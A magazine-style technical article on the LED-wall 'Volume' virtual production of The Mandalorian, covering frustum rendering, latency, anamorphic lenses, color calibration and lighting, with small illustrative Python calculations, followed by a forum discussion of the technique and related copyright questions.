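        t = np.dot(vu, vc) * near / d
        return l, r, b, t

    # Example: a 6 m-wide, 6 m-tall wall segment at z=0; camera 4 m back,
    # 1 m left of center, at 1.7 m eye height.
    pa = np.array([-3.0, 0.0, 0.0])
    pb = np.array([ 3.0, 0.0, 0.0])
    pc = np.array([-3.0, 6.0, 0.0])
    pe = np.array([-1.0, 1.7, 4.0])
    print(off_axis_frustum(pa, pb, pc, pe, near=0.1))

As the tracked camera moves, the frustum is recomputed every frame and the wall re-rendered, which is what produces the moving parallax the article describes.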

It takes 11 interlinked computers to serve the images to the wall: three processors are dedicated to real-time rendering, and four servers provide three 4K images seamlessly side-by-side on the wall and one 4K image on the ceiling. That delivers an image size of 12,288 pixels wide by 2,160 high on the wall and 4,096 x 2,160 on the ceiling. Even so, as described above, the full 270 degrees (plus the movable back LED walls) and ceiling cannot be rendered high-resolution and photo-real in real time, which is why the high-resolution render is confined to the camera's current field of view.

Mando stands in a canyon on the planet Arvala. The rocks behind him are on the LED wall, while some practical rocks are placed in the mid- and foreground to blend the transition. The floor of the stage is covered in mud and rocks for this location. On the jib is an Arri Alexa LF with a Panavision Ultra Vista anamorphic lens.

Due to the 10-12 frames (roughly half a second) of latency from the time Profile's system received camera-position information to Unreal's rendering of the new position on the LED wall, if the camera moved ahead of the rendered frustum (a term defining the virtual field of view of the camera) on the screen, the transition line between the high-quality perspective render window and the lower-quality main render would be visible. To avoid this, the frustum was projected an average of 40-percent larger than the actual field of view of the camera/lens combination, to allow some safety margin for camera moves. In some cases, if the lens' field of view — and therefore the frustum — was too wide, the system could not render an image high-res enough in real time; the production would then use the image on the LED screen simply as lighting, and composite the image in post [with a greenscreen added behind the actors]. In those instances, the backgrounds were already created, and the match was seamless because those actual backgrounds had been used at the time of photography [to light the scene].
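For a sense of what that 40-percent margin buys, here is a back-of-envelope sketch; the latency and margin are from the article, while the horizontal field of view is an assumed figure:

    # How fast can the camera pan before it outruns the padded high-res
    # window on the wall?
    fov_deg = 40.0                               # assumed horizontal FOV
    margin = 0.40                                # frustum rendered ~40% larger
    latency_s = 12 / 24                          # worst case: 12 frames at 24 fps

    pad_per_side_deg = fov_deg * margin / 2      # extra coverage on each side
    max_pan_deg_per_s = pad_per_side_deg / latency_s
    print(f"~{max_pan_deg_per_s:.0f} deg/s")     # ~16 deg/s stays inside the pad

That kind of budget fits the slow, "grounded" camera moves described next.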

Fortunately, says Fraser, Favreau wanted The Mandalorian to have a visual aesthetic that would match that of the original Star Wars. This meant a more "grounded" camera, with slow pans and tilts, and non-aggressive camera moves — an aesthetic that helped to hide the system latency. "In addition to using some of the original camera language in Star Wars, Jon is deeply inspired by old Westerns and samurai films, so he also wanted to borrow a bit from those, especially Westerns," Fraser notes. "The Mandalorian is, in essence, a gunslinger, and he's very methodical. This gave us a set of parameters that helped define the look of the show. At no point will you see an 8mm fisheye lens in someone's face. That just doesn't work within this language.

"It was also of paramount importance to me that the result of this technology not just be 'suitable for TV,' but match that of major, high-end motion pictures," Fraser continues. "We had to push the bar to the point where no one would really know we were using new technology; they would just accept it as is. Amazingly, we were able to do just that."

Steadicam operator Simon Jayes tracks Mando, Mayfeld (Bill Burr) and Ran Malk (Mark Boone Jr.) in front of the LED wall. While the 10- to 12-frame latency of rendering the high-resolution "frustum" on the wall can be problematic, Steadicam was employed liberally in Episode 6 to great success.

Shot on Arri's Alexa LF, The Mandalorian was the maiden voyage for Panavision's full-frame Ultra Vista 1.65x anamorphic lenses. The 1.65x anamorphic squeeze allowed for full utilization of the 1.44:1 aspect ratio of the LF to create a 2.37:1 native aspect ratio, which was only slightly cropped to 2.39:1 for exhibition.
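The squeeze arithmetic works out as quoted; a tiny sketch for the record, using the article's figures:

    sensor_ar = 1.44     # Alexa LF open gate
    squeeze = 1.65       # Ultra Vista anamorphic squeeze
    print(f"{sensor_ar * squeeze:.2f}:1")   # 2.38:1, i.e. the quoted ~2.37:1
                                            # native ratio, cropped to 2.39:1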

"We chose the LF for a couple reasons," explains Fraser. "Star Wars has a long history of anamorphic photography, and that aspect ratio is really key. We tested spherical lenses and cropping to 2.40, but it didn't feel right. It felt very contemporary, not like the Star Wars we grew up with. Additionally, the LF's larger sensor changes the focal length of the lens that we use for any given shot to a longer lens and reduces the overall depth of field. The T2.3 of the Ultra Vistas is more like a T0.8 in Super 35, so with less depth of field, it was easier to put the LED screen out of focus faster, which avoided a lot of issues with moiré. It allows the inherent problems in a 2D screen displaying 3D images to fall off in focus a lot faster, so the eye can't tell that those buildings that appear to be 1,000 feet away are actually being projected on a 2D screen only 20 feet from the actor.

Fraser operates an Alexa LF, shooting a close-up of the Ugnaught Kuiil (Misty Rosas in the suit, voiced by Nick Nolte). The transition between the bottom of the LED wall and the stage floor is clearly seen here. That area was often obscured by physical production design or replaced in post.

"The Ultra Vistas were a great choice for us because they have a good amount of character and softness," Fraser continues. "Photographing the chrome helmet on Mando is a challenge — its super-sharp edges can quickly look video-like if the lens is too sharp. Having a softer acutance in the lens, which [Panavision senior vice president of optical engineering and ASC associate] Dan Sasaki [modified] for us, really helped. The lens we used for Mando tended to be a little too soft for human faces, so we usually shot Mando wide open, compensating for that with ND filters, and shot people 2⁄3 stop or 1 stop closed."

According to Idoine, the production used 50mm, 65mm, 75mm, 100mm, 135mm, 150mm and 180mm Ultra Vistas that range from T2 to T2.8, and he and Fraser tended to expose at T2.5-T3.5. "Dan Sasaki gave us two prototype Ultra Vistas to test in June 2018," he says, "and from that we worked out what focal-length range to build.

Director Bryce Dallas Howard confers with actress Gina Carano — as mercenary Cara Dune — while shooting the episode "Chapter 4: Sanctuary."

"Our desire for cinematic imagery drove every choice," Idoine adds. And that included the incorporation of a LUT emulating Kodak's short-lived 500T 5230 color negative, a favorite of Fraser's. "I used that stock on Killing Them Softly [AC Oct. '12] and Foxcatcher [AC Dec. '14], and I just loved its creamy shadows and the slight magenta cast in the highlights," says Fraser. "For Rogue One, ILM was able to develop a LUT that emulated it, and I've been using that LUT ever since."

"Foxcatcher was the last film I shot on the stock, and then Kodak discontinued it," continues Fraser. "At the time, we had some stock left over and I asked the production if we could donate it to an Australian film student and they said 'yes,' so we sent several boxes to Australia. When I was prepping Rogue One, I decided that was the look I wanted — this 5230 stock — but it was gone. On a long shot, I wrote an email to the film student to see if he had any stock left and, unbelievably, he had 50 feet in the bottom of his fridge. I had him send that directly to ILM and they created a LUT from it that I used on Rogue and now Mandalorian."

Actor Giancarlo Esposito as Moff Gideon, an Imperial searching for the Child.

A significant key to the Volume's success in creating in-camera final VFX was color-matching the wall's LED output to the color matrix of the Arri Alexa LF camera. ILM's Matthias Scharfenberg, J. Schulte and their team thoroughly tested the Roe Black Pearl LEDs' capabilities and matched them to the color sensitivity and reproduction of the LF to make the two seamless partners. LEDs are very narrow-band emitters: the red, green and blue diodes each output a very narrow spectrum of color, which makes some colors very difficult to reach, and making the panels compatible with the color filter array on the camera's ALEV-III sensor was a further challenge. Using a carefully designed series of color patches, a calibration sequence was run on the LED wall to sync it with the camera's sensitivity. This means any other model of camera shooting on the Volume will not receive proper color, but the Alexa LF will; and while the color reproduction of the LEDs may not have looked right to the eye, through the camera it appeared seamless. In short, off-the-shelf LED panels won't quite deliver the accuracy necessary for a high-end production, but with custom tweaking they were successful. There were limitations, however: with low-light backgrounds, the screens would block up and alias in the shadows, making them unsuitable for in-camera finals, although with further development of the color science this has been solved for season two.

A significant asset to the LED Volume wall and images projected from it is the interactive lighting provided on the actors, sets and props within the Volume. The light that is projected from the imagery on the LED wall provides a realistic sense of the actor (or set/props) being within that environment in a way that is rarely achievable with green- or bluescreen composite photography. If the sun is low on the horizon on the LED wall, the position of the sun on the wall will be significantly brighter than the surrounding sky. This brighter spot will create a bright highlight on the actors and objects in the Volume just as a real sun would from that position. Reflections of elements of the environment from the walls and ceiling show up in Mando's costume as if he were actually in that real-world location.

"When you're dealing with a reflective subject like Mando, the world outside the camera frame is often more important than the world you see in the camera's field of view," Fraser says. "What's behind the camera is reflected in the actor's helmet and costume, and that's crucial to selling the illusion that he's in that environment. Even if we were only shooting in one direction on a particular location, the virtual art-department would have to build a 360-degree set so we could get the interactive lighting and reflections right. This was also true for practical sets that were built onstage and on the backlot — we had to build the areas that we would never see on camera because they would be reflected in the suit. In the Volume, it's this world outside the camera that defines the lighting.

"When you think about it, unless it's a practical light in shot, all of our lighting is outside the frame — that's how we make movies," Fraser continues. "But when most of your lighting comes from the environment, you have to shape that environment carefully. We sometimes have to add a practical or a window into the design, which provides our key light even though we never see that [element] on camera."

The fight with the mudhorn likely negated any worry about helmet reflections for this scene.

The interactive lighting of the Volume also significantly reduces the requirement for traditional film production lighting equipment and crew. The light emitted from the LED screens becomes the primary lighting on the actors, sets and props within the Volume. Since this light comes from a virtual image of the set or location, the organic nature of the quality of the light on the elements within the Volume firmly ground those elements into the reality presented.

There were, of course, limitations. Although LEDs are bright and capable of emitting a good deal of light, they cannot re-create the intensity and quality of direct, natural daylight. "The sun on the LED screen looks perfect because it's been photographed, but it doesn't look good on the subjects — they look like they're in a studio," Fraser attests. "It's workable for close-ups, but not really for wide shots. For moments with real, direct sunlight, we headed out to the backlot as much as possible." That "backlot" was an open field near the Manhattan Beach Studios stages, where the art department built various sets. (Several stages were used for creating traditional sets as well.)

Overcast skies, however, proved a great source in the Volume. The skies for each "load" — the term given for each new environment loaded onto the LED walls — were based on real, photographed skies. While shooting a location, the photogrammetry team shot multiple stills at different times of day to create "sky domes." This enabled the director and cinematographer to choose the sun position and sky quality for each set. "We can create a perfect environment where you have two minutes to sunset frozen in time for an entire 10-hour day," Idoine notes. "If we need to do a turnaround, we merely rotate the sky and background, and we're ready to shoot!"

Idoine (seated at camera) in discussion with Favreau and Filoni on a practical set.

During prep, Fraser and Idoine spent a lot of time in the virtual art department, whose crew created the virtual backgrounds for the LED loads. They spent many hours going through each load to set sky-dome choices and pick the perfect time of day and sun position for each moment. They could select the sky condition they wanted, adjust the scale and the orientation, and finesse all of these attributes to find the best lighting for the scene. Basic, real-time ray tracing helped them see the effects of their choices on the virtual actors in the previs scene. These choices would then be saved and sent off to ILM, whose artists would use these rougher assets for reference and build the high-resolution digital assets.

The virtual art department starts its job by creating 3-D virtual sets of each location to production designer Andrew Jones' specifications; the director and cinematographer can then go into the virtual location with VR headsets and do a virtual scout. Digital actors, props and sets are added and can be moved about, and coverage is chosen during the virtual scout. The cinematographer then follows the process as the virtual set is further textured with photogrammetry elements and the sky domes are added.

The virtual world on the LED screen is fantastic for many uses, but an actor obviously cannot walk through the screen, so an open doorway doesn't work when it's virtual. Doors are one aspect of production design that always have to be physical: if a character walks through a door, that door must be real.

Favreau gets his western-style saloon entrance from the first episode of The Mandalorian.

If an actor is close to a set piece, it is usually preferred that the piece be physical rather than virtual: if they're close to a wall, it should be a physical wall, so that they are actually near something real.

Many objects that are physical are also virtual. Even if a prop or set piece is physically constructed, it is scanned and incorporated into the virtual world so that it becomes not only a practical asset, but a digital one as well. Once it's in the virtual world, it can be turned on or off on a particular set or duplicated.

"We take objects that the art department have created and we employ photogrammetry on each item to get them into the game engine," explains Clint Spillers, Virtual Production Supervisor. "We also keep the thing that we scanned and we put it in front of the screen and we've had remarkable success getting the foreground asset and the digital object to live together very comfortably."

Another challenge of production design is the requirement that every set be executed in full 360 degrees. While in traditional filmmaking a production designer may be tempted to shortcut a design, knowing that the camera will only see a small portion of a particular set, in this world the set that is off camera is just as important as the set that is seen on camera.

"This was a big revelation for us early on," attests production designer Andrew Jones. "We were, initially, thinking of this technology as a backdrop — like an advanced translight or painted backdrop — that we would shoot against and hope to get in-camera final effects. We imagined that we would design our sets as you would on a normal film: IE, the camera sees over here, so this is what we need to build. In early conversations with DP Greig Fraser he explained that the off-camera portion of the set — that might never be seen on camera — was just as vital to the effect. The whole Volume is a light box and what is behind the camera is reflected on the actor's faces, costumes, props. What's behind the camera is actually the key lighting on the talent.

IG-11 and Mando encounter their target.

"This concept radically changed how we approach the sets," Jones continues. "Anything you put in The Volume is lit by the environment, so we have to make sure that we conceptualize and construct the virtual set in its entirety of every location in full 360. Since the actor is, in essence, a chrome ball, he's reflecting what is all around him so every detail needs to be realized."

They sometimes used photogrammetry as the basis, but always relied upon the same visual-effects artists who create environments for the Star Wars films to realize these real-time worlds — "baking in" lighting choices established earlier in the pipeline with high-end, ray-traced rendering.

"I chose the sky domes that worked best for all the shots we needed for each sequence on the Volume," Fraser notes. "After they were chosen and ILM had done their work, I couldn't raise or lower the sun because the lighting and shadows would be baked in, but I could turn the whole world to adjust where the hot spot was."

Fraser noted a limitation on the adjustments that can be made to the sky domes once they're live on the Volume after ILM's finalization. The world can be rotated, the center position changed, and the intensity and color adjusted, but the actual position of the sun in the sky dome can't be altered, because ILM has done the ray tracing ahead of time and "baked" in the shadows the sun casts on the terrain. This is done to minimize the computations necessary for advanced ray tracing in real time. If the chosen sun position were changed, those baked-in shadows wouldn't change (only the elements reserved for real-time rendering and simple ray tracing would be affected), and the backgrounds would look false because the lighting direction wouldn't match the baked-in shadows.

From time to time, traditional lighting fixtures were added to augment the output of the Volume.

In the fourth episode, the Mandalorian is looking to lay low and travels to the remote farming planet of Sorgan and visits the common house, which is a thatched, basket-weave structure. The actual common house was a miniature built by the art department and then photographed to be included in the virtual world. The miniature was lit with a single, hard light source that emulated natural daylight breaking through the thatched walls. "You could clearly see that one side of the common house was in hard light and the other side was in shadow," recalls Idoine. "There were hot spots in the model that really looked great so we incorporated LED "movers" with slash gobos and Charlie Bars [long flags] to break up the light in a similar basket-weave pattern. Because of this very open basket-weave construction and the fact that the load had a lot of shafts of light, I added in random slashes of hard light into the practical set and it mixed really well."

The Volume could incorporate virtual lighting, too, via the "Brain Bar," a NASA Mission Control-like section of the soundstage where as many as a dozen artists from ILM, Unreal and Profile sat at workstations and made the technology of the Volume function. Their work was able to incorporate on-the-fly color-correction adjustments and virtual-lighting tools, among other tweaks.

Matt Madden, president of Profile and a member of the Brain Bar team, worked closely with Fraser, Idoine and gaffer Jeff Webster to incorporate virtual-lighting tools via an iPad that communicated back to the Bar. He could create shapes of light on the wall of any size, color and intensity. If the cinematographer wanted a large, soft source off-camera, Madden was able to create a "light card" of white just outside the frustum. The entire wall outside the camera's angle of view could be a large light source of any intensity or color that the LEDs could reproduce.

In this case, the LED wall was made up of Roe Black Pearl BP2 screens with a max brightness of 1,800 nits. Taking roughly 10.764 nits as equivalent to 1 foot-candle, at peak brightness the wall could create an intensity of about 168 foot-candles, the equivalent of f/8 and three-quarters at 800 ISO (24fps, 180-degree shutter). While the Volume was never shot at peak full white, any lighting "cards" that were added were capable of outputting this brightness.
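A sketch of that light-level arithmetic. Two caveats: nits measure luminance and foot-candles illuminance, so equating them numerically is the article's shorthand; and the incident-exposure constant C is a standard but meter-dependent assumption, not a figure from the article:

    import math

    nits = 1800
    lux = nits                       # the article's shorthand assumption
    fc = lux / 10.764                # 1 fc = 10.764 lux
    print(f"{fc:.0f} foot-candles")  # ~167, matching the quoted "about 168"

    # Incident-light exposure: N^2 = E * t * S / C, C commonly ~250-330.
    iso, t, C = 800, 1 / 48, 250     # 800 ISO, 24 fps with 180-degree shutter
    n = math.sqrt(lux * t * iso / C)
    print(f"f/{n:.1f}")              # f/11.0 with C=250; the article's
                                     # "f/8 3/4" (~f/10.4) implies C near 280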

Idoine discovered that a great additional source for Mando was a long, narrow band of white near the top of the LED wall. "This wraparound source created a great backlight look on Mando's helmet," Idoine says. Alternatively, he and Fraser could request a tall, narrow band of light on the wall that would reflect on Mando's full suit, similar to the way a commercial photographer might light a wine bottle or a car — using specular reflections to define shape.

Additionally, virtual black flags — meaning areas where the LED wall was set to black — could be added wherever needed, and at whatever size. The transparency of the black could also be adjusted to any percentage to create virtual nets.

Kuiil on his Blerg.

The virtual LED environments were hugely successful, but traditional greenscreen still played a significant role in the production of The Mandalorian, and it was always on hand, especially for situations where the frustum was too wide for the system to adequately respond. The Volume was also capable of producing virtual greenscreen on the LED wall, which could be any size and any hue or saturation of green. The benefits were considerable: a virtual greenscreen is nearly immediate, requiring no rigging, stands, setup time or additional lighting, and it can be sized to precisely outline the subject to be replaced, which greatly minimized and sometimes even eliminated green spill on the actors and surrounding set. That, in turn, all but eliminates the need to de-spill green in post, a time-consuming and tedious process.

The virtual greenscreens can, of course, only be on the LED wall. If the lower portion of an actor's body or a set piece needs to be composited, physical greenscreen is required, as the floor is not an LED screen and a virtual green cannot extend past the LED wall.

When green is employed, live compositing is possible for the camera operator's on-board monitor and the director's monitor so that they can see the elements that will be composited into the shot and compose the framing accordingly.

The Mandalorian workflow was somewhat inverted, because — unlike on typical productions — virtual backgrounds and CG elements had to be finished before principal photography commenced. Once the cinematographer approved the locations and lighting in the virtual art-department, the images were delivered to ILM for their work, which took about six weeks to complete for each load. At the time of photography, some manipulation and alteration of the virtual elements could take place, but many decisions about coverage, blocking and lighting were already locked in. Naturally, this required a degree of collaboration among the director, cinematographer, production designer and visual-effects supervisor that was closer than that on a typical production. But, as Fraser notes, it also meant that the cinematographer was hands-on throughout the creation of all the images.

"In today's production workflow, the cinematographer comes in to prep the film and then shoots and then is sent away until the grading process — so much work with the image happens in post that we're not a part of," asserts Fraser. "This inverted production workflow of The Mandalorian keeps the cinematographer in the loop from the development of the image to the final image, which is often captured in-camera. Baz and I are there to shepherd the image through the whole process and this is so supremely important. Cinematographers work to design imagery every day, 12 hours a day, and we know how to look at an image and know immediately if its right or wrong. Visual effects artists have amazing skills, but they don't always have the photographic experience to know what is right or wrong and a lot of times what we plan and photograph doesn't get translated through post. With this kind of workflow we supervise every element of the shot and have a much closer partnership with visual effects to make sure that it works with what we and the director planned and executed on set. We get that final shot in camera and the result is pretty amazing."

"I personally enjoy that pipeline," Favreau attests. "I have tried to learn as much as I could from the way animation approaches the pre-production and production schedule. I think the earlier in the process you can solve story issues, the more efficient the production process becomes. Animation has traditionally front-loaded the story process, whereas live-action allows you to kick the can down the road."

The Bounty Hunter IG-11 is after the asset.

The ability to select the perfect lighting conditions would seem to let a cinematographer create the perfect look for every shot. How wonderful would it be to have magic hour all day long, or even all week, for that matter? Yet Fraser is keenly aware of making things too perfect and introducing an unnecessary artifice to the overall visual style of the show. "I won't always want it to be a perfect backlight, because that ends up looking fake," Fraser attests. "It's not real. In the real world, we have to shoot at different times and we have to compromise a little, so if I build in a little bit of 'roughness,' it will feel more real and less fake. The idea is to introduce a little 'analog' to make the digital look better, to make it feel more real and make the effect even more seamless as if it were all real locations.

"That's where the system is very good," Fraser continues. "It allows you to see what you're photographing in real-time. There are times in the real world where you don't have a choice and you have to shoot something front-lit, but you still work to make it look pleasing. You shoot an exterior for four hours and the sun moves constantly and you get locked into those couple shots that aren't perfectly backlit — but that's reality. When you have the ability to make it perfect for every shot, that doesn't feel right, so we had to really think about building in some analog. Jon was really keenly aware of this, as well. He had just finished doing The Lion King with Caleb [Deschanel, ASC] and they had scenes that they would stage in direct hard noon sunlight to give the film a more realistic feeling instead of just doing everything perfectly at golden hour — that just feels false."

"We all felt a little like film students at the start of this," Fraser says. "It's all new, and we were discovering the limitations and abilities of the system as we went along. We continually pushed the system to break it and see where the edges of the envelope were — but the technology continued to evolve and allow us to push that envelope further. We'd say, 'Oh, man, I wish we could ...' and someone at the Brain Bar would say, 'Yeah, I think we can!' And the next day we'd have that ability. It was pretty amazing."

Idoine readies the camera for a scene.

TECH SPECS
2.39:1 Anamorphic Digital Capture
Arri Alexa LF; LF Open Gate, ArriRaw, 4.5K
Panavision Ultra Vista, 1.65x squeeze




All Comments: [-] | anchor

asmosoinio(3257) 4 days ago [-]

Why is this one person always referred to with 'ASC, ACS' after their name?

> Greig Fraser, ASC, ACS

numpad0(10000) 4 days ago [-]

I believe many film-workers' unions demand that their members' names always be followed by the society's initials, with zero exceptions, to protect the union and its members' rights.

Show business was/is one of the industries where unions worked.

emmsii(10000) 4 days ago [-]

It means they are a member of the American Society of Cinematographers (ASC) and I believe the Australian Cinematographers Society (ACS).

severak_cz(10000) 4 days ago [-]

Funny that this is practically the same concept as shooting in a studio with the exterior background painted on the walls, as was done in old movies. The progress is only in the technology: now it's created by a game engine and shown on giant LEDs; back in the 1930s it was painted by hand.

estebank(10000) 4 days ago [-]

I think the innovation is the perspective correction of the background depending on the camera. That could have been accomplished with rear projection in film if it had been necessary by having the camera follow a preset path, but I don't think even BTTF attempted that.

pupdogg(10000) 5 days ago [-]

The highest resolution LED panel pixel pitch I've seen to date is 0.7mm...wouldn't this result in a lower resolution capture of the projected background? Specifically, when they're trying to shoot movies at or above 4K range? Also, how do they cope with the scan rate of the background video being played back to sync with the camera recording the footage?

jxy(4169) 5 days ago [-]

Depending on your viewing distance, the pixel pitch of 2.84mm is practically a retina display if you look at it 10m away.
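For reference, the arithmetic behind that claim, taking "retina" as the common one-arcminute-per-pixel rule of thumb (a sketch, not from the article):

    import math

    one_arcmin = math.radians(1 / 60)           # ~"retina" angular pixel size
    pitch_mm = 10_000 * math.tan(one_arcmin)    # pitch subtending 1' at 10 m
    print(f"{pitch_mm:.2f} mm")                 # ~2.91 mm vs the wall's 2.84 mm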

thegoleffect(4264) 5 days ago [-]

In some photos, you can see that from the camera's POV, the area around the actors is displayed on LED as green screen so the actors can be masked out. Then, a higher resolution background is composited in. Thus, the original LED serves to accurately light the scene to reflect the background but not always to actually be the background.

snowwrestler(4200) 4 days ago [-]

One of the details from the article is that using anamorphic lenses essentially treats the camera sensor as if it is larger than it actually is, which reduces the effective depth of field.

If you look carefully at the backgrounds in Mandalorian scenes, a lot of the time, they are slightly soft (out of focus)--which hides the pitch of the LED wall by expanding each LED point into larger, overlapping circles of confusion. To be clear, that softness is a physical effect of the camera lens, not a digital effect on the wall, so it can be captured by the camera sensor up to any resolution you want.
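Roughly, the defocus blur of a background point, measured at the wall plane itself, is the lens aperture scaled by the focus geometry. A small sketch with an assumed lens and assumed distances (none of these figures are from the article):

    # Blur diameter at the wall ~ aperture * (wall - focus) / focus,
    # i.e. the defocus cone re-expanding past the focus plane.
    focal_mm = 100
    t_stop = 2.5
    aperture_mm = focal_mm / t_stop        # entrance pupil diameter, ~40 mm

    focus_m = 3.0                          # focused on the actor at 3 m
    wall_m = 6.0                           # LED wall 6 m from camera
    blur_at_wall_mm = aperture_mm * (wall_m - focus_m) / focus_m
    print(f"~{blur_at_wall_mm:.0f} mm")    # ~40 mm >> the 2.84 mm pitch, so
                                           # adjacent LEDs smear together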

> Also, how do they cope with the scan rate of the background video being played back to sync with the camera recording the footage?

In the article they say the latency is about half a second (10 to 12 frames), which they handled by using slow camera moves--which conveniently is similar to how the original Star Wars films were shot.

If you're talking about the refresh rate of the LEDs, I believe those can be cranked up way higher than the frame rate of the camera, which was likely 24 or maybe 30 frames per second to give that cinematic feel.

devindotcom(4030) 5 days ago [-]

This is super interesting stuff and I've been following it for some time. I just wrote it up with a bit more context:

https://techcrunch.com/2020/02/20/how-the-mandalorian-and-il...

It's not just ILM and Disney either, this is going to be everywhere. It's complex to set up and run in some ways but the benefits are enormous for pretty much everyone involved. I doubt there will be a major TV or film production that doesn't use LED walls 5 years from now.

dd36(4145) 5 days ago [-]

I wonder how much this reduces the environmental footprint. The explosion in shows and movies always looking for raw nature or awesome settings has me wondering how much destruction it causes, and how much waste it produces.

tobr(1728) 4 days ago [-]

Is there any way to read your article if I can't figure out how to navigate through the legalese and dark patterns of Verizon's privacy extortion wall?

treblig(3350) 5 days ago [-]

'Postproduction was mostly refining creative choices that we were not able to finalize on the set in a way that we deemed photo-real.'

Does anyone know how they were able to swap out the in-camera version of the background originally shown on the LED wall with something more convincing later? Seems like it'd be tough since it's not a green screen!

janekm(10000) 4 days ago [-]

While currently they use a 'green screen' in those instances, given that the camera positions are already being tracked and the image displayed on the screens is known, it would be possible to re-render the image the camera should have seen had the foreground elements not been present, and use the difference from the recorded image as a mask for further post-processing.

(which would be very cool as it would also allow using a low-resolution version of the background during production that could then be re-rendered with a higher resolution image after the fact)
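
A toy version of that difference matte in Python (assuming perfectly aligned, color-matched frames, which is the hard part in practice; lens effects and light spill are presumably why the green patches mentioned below are still used):

    import numpy as np

    def difference_matte(recorded, rerendered, threshold=0.08):
        # Mark pixels where the recorded frame differs from a re-render
        # of the wall content as the tracked camera would have seen it.
        # Inputs: float HxWx3 arrays in [0, 1].
        diff = np.abs(recorded - rerendered).max(axis=-1)
        return diff > threshold

    rerendered = np.zeros((4, 6, 3))  # 'empty wall' re-render
    recorded = rerendered.copy()
    recorded[1:3, 2:4] = 0.9          # a bright 'actor' patch
    print(difference_matte(recorded, rerendered).astype(int))
    # 1s mark the foreground region to hand off to post-processing.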

czr(10000) 5 days ago [-]

IIRC they project a small green region around the actors and real props, so that ambient light and reflections are still mostly correct but they can also pull a clean matte.

web-cowboy(10000) 5 days ago [-]

So we'll be able to play video game adaptations of the locations in the episodes really easily/soon, right? ;)

cgrealy(10000) 5 days ago [-]

I'd say it wouldn't help much. You're building one small scene that's designed to be viewed from a relatively small area or path. I highly doubt they're building anything that doesn't appear on screen. If you were to walk about that scene in Unreal... I'd imagine it's the digital equivalent of a fake old west town.

ghostbrainalpha(10000) 5 days ago [-]

That has to be a consideration. But I don't know how much it would really speed up production of a AAA Mandalorian game. Some... maybe a 6 month head start on a 4-5 year game.

It would definitely help make the game environments higher quality and be a cost saving to the studio.

petermcneeley(4203) 5 days ago [-]

This technique will produce potentially significant rendering artifacts in the final image. The backdrop is correct only from the position of the camera. A reflection from any surface will not be geometrically correct (as seen in the image from the article). I think that even ambient lighting would contain noticeable deformations.

virtualritz(4070) 5 days ago [-]

It's much better than the reflection of a green/blue screen or an empty studio with some cameras and people.

Glossy surfaces are usually not a problem unless they're (near) perfect mirrors. Even then -- lights are usually what you see in most reflections because they're orders of magnitude brighter than the rest of the set.

If reflections are a problem with this new technique in certain settings, they would be even more so with the current state of the art.

In those cases you replace them digitally. There's no way around that, either way.

Related trivia: The chrome starships in EP1 were actually rendered with environment mapping and reflection occlusion[1]. Even most games do better stuff today. Did you notice? :]

[1] http://www.spherevfx.com/downloads/ProductionReadyGI.pdf 5.3 Reflection Occlusion, pp. 89

vsareto(4223) 5 days ago [-]

Can you get a decent job just by knowing Unreal Engine well? Maybe by just doing small POC projects?

vernie(10000) 5 days ago [-]

Libreri and Sweeney are trying their damnedest to make that true.

mattigames(3961) 4 days ago [-]

If by 'well' you mean including Blueprints and physics-based shaders, then probably yes; although skills like 3D rigging and modeling, which are done in separate third-party tools, are a must for a lot of related jobs.

rebuilder(10000) 5 days ago [-]

The Mandalorian was probably an ideal candidate for this kind of approach, since it's essentially a western, meaning a lot of wide landscape shots.

The LED screen approach works nicely for fairly uncomplicated background geometry, like a plain. Try shooting Spiderman climbing up walls on that, and things will get tricky fast.

As the article notes, slow camera moves are a plus as well. The reason given is technical, but I also wonder how far you could really push the camera motion even if tracking lag wasn't an issue. The background is calculated to match the camera's viewpoint, so I expect it would be very disorienting for the actors if the camera was moving at high speeds.

wbl(4034) 5 days ago [-]

Spiderman climbing up a wall can be done via forced perspective. It's also an action scene, reducing the need for a background to help the actor. And some brave souls will Harold Lloyd it.

cbhl(3478) 5 days ago [-]

'The solution was ... a dynamic, real-time, photo-real background played back on a massive LED video wall and ceiling ... rendered with correct camera positional data.'

Gee, that sounds a lot like a holodeck. We've come a long way from using Wii Sensor Bars[0] for position tracking.

[0] https://www.youtube.com/watch?v=LC_KKxAuLQw

modeless(1461) 5 days ago [-]

The 'holodeck' version of this is called a CAVE and the first one was built in 1992: https://www.youtube.com/watch?v=aKL0urEdtPU https://en.wikipedia.org/wiki/Cave_automatic_virtual_environ...

overcast(4273) 5 days ago [-]

Speaking of the Wii, does anyone else wish that motion controls could just be removed from its existing library? Not only are they a major annoyance in most games, but they're basically locked into that hardware now.

ragebol(4315) 5 days ago [-]

For the VFX industry, tracking had already been solved ages ago, with those little reflective balls on suits etc. in a mocap system. The Wii sensor bar's thing was that it was really cheap.

But yes, damn close to a holodeck. But you can't see depth in this setup, right?

flashman(3837) 5 days ago [-]

I wonder how the photogrammetry aspect will intersect with intellectual property laws. The example used - scanning in a Santa Monica bar so that you can do reshoots without revisiting the location - would be an obvious example that might raise someone's hackles ('because it's our bar you're using to make your money' for instance). If you add that bar to your digital library, do you have to pay them royalties each time you use it? Is it any different to constructing a practical replica of a real-life location?

Can someone wearing a few cameras walk through a building and digitise it completely without getting the owner's permission? Here in Australia, 'copyright in a building or a model of a building is not infringed by the making of a painting, drawing, engraving or photograph of the building or model or by the inclusion of the building or model in a cinematograph film or in a television broadcast,' for instance. (Copyright Act 1968 §66)

kragen(10000) 5 days ago [-]

If you have to pay royalties, they won't be to the bar; they'll be to the bar's architect. Copyright law generally only covers expressive, rather than functional, aspects of a copyrighted work, so things like doors and walls might be okay, but architectural design is recognized as copyrightable.

In general I strongly recommend avoiding the term 'intellectual property' because it conflates several different areas of law with almost totally unrelated traditions, statutes, and (in common-law countries) precedents — copyrights, patents, design patents, mask works, trademarks, trade secrets, and most alarmingly, in the EU, database rights. (Moreover, it's an extremely loaded term, like 'pro-life' and 'pro-choice'.)

BubRoss(10000) 4 days ago [-]

When shooting at a location, the owner is paid a location fee. Detailed and specialized photography has been used at locations for decades at this point. This is a refinement of what is already happening, not something completely new.

paulmd(3834) 5 days ago [-]

A potential analogy might be something like using Carrie Fisher's image in the new Star Wars movies. I would assume the estate got paid for that. Or holo-tupac.

Practically speaking I think it will come down to what you negotiate. If you negotiate usage of the bar for your series then you can use it, otherwise not. If you negotiate resale of that model then that's legal, otherwise not. Most large productions will probably want to stay far on the right side of the law and get a written/financial agreement until things are hammered out, then you'll have amateur filmmakers who have to do vigilante shoots.

And again, probably something that will have to be legislated out for the long term.

In France, the appearance of buildings can be copyrighted; famously, the Eiffel Tower's operators are very aggressive about suing photographers.

